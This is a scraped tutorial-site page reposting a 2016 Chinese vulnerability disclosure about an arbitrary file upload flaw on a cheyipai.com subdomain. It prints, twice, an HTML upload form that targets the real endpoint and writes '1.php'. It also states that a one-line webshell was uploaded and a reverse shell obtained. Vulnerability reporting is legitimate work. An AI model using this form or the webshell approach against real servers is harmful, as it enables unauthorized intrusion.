masyarakat Belajar Perpustakaan Alatan Masa lapang
cari
Melayu
Rumah > hujung hadapan web > html tutorial > 车易拍某站Getshell_html/css_WEB-ITnose

车易拍某站Getshell_html/css_WEB-ITnose

WBOY
Lepaskan: 2016-06-21 08:51:57
asal
1249 orang telah melayarinya

漏洞标题 车易拍某站Getshell
相关厂商 cheyipai.com
漏洞作者 荒废的腰子
提交时间 2016-03-28 11:03
公开时间 2016-04-02 11:10
漏洞类型 文件上传导致任意代码执行
危害等级
自评Rank 15
漏洞状态 漏洞已经通知厂商但是厂商忽略漏洞
Tags标签 getshell, 任意文件上传

漏洞详情

存在可以上传文件的地方

http://imo.cheyipai.com/file/NDisk/write.php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>
Salin selepas log masuk
Salin selepas log masuk

上传一句话木马

成功反弹shell

漏洞证明:

存在可以上传文件的地方

http://imo.cheyipai.com/file/NDisk/write.php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>
Salin selepas log masuk
Salin selepas log masuk

上传一句话木马

成功反弹shell

修复方案:

升级

版权声明:转载请注明来源 荒废的腰子@ 乌云

【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】

Label berkaitan:
车易拍某站Getshell
sumber:php.cn
Artikel sebelumnya:Airbnb CSS / Sass 指南_html/css_WEB-ITnose Artikel seterusnya:CSS的背景图的sprite_html/css_WEB-ITnose
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Artikel terbaru oleh pengarang
Isu terkini
function_exists() tidak boleh menentukan fungsi tersuai Ujian fungsi () {return true;} jika (function_exists ('test')) {echo "test is functio...
daripada 2024-04-29 11:01:01
0
3
2041
Bagaimana untuk memaparkan versi mudah alih Google Chrome Hello cikgu, bagaimana saya boleh menukar Google Chrome kepada versi mudah alih?
daripada 2024-04-23 00:22:19
0
11
2200
Tetingkap anak mengendalikan tetingkap induk, tetapi output tidak bertindak balas. Dua ayat pertama boleh dilaksanakan, tetapi ayat terakhir tidak boleh dilaksanakan.
daripada 2024-04-19 15:37:47
0
1
1855
Tiada output dalam tetingkap induk document.onclick = function(){ window.opener.document.write('Saya adalah output tetingkap ...
daripada 2024-04-18 23:52:34
0
1
1745
Di manakah perisian kursus tentang pemetaan minda CSS? Perisian kursus
daripada 2024-04-16 10:10:18
0
0
1766
Topik-topik yang berkaitan
Lagi>
Cadangan popular
Tutorial Popular
Lagi>
Tutorial berkaitan
Cadangan popular
Kursus terkini
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan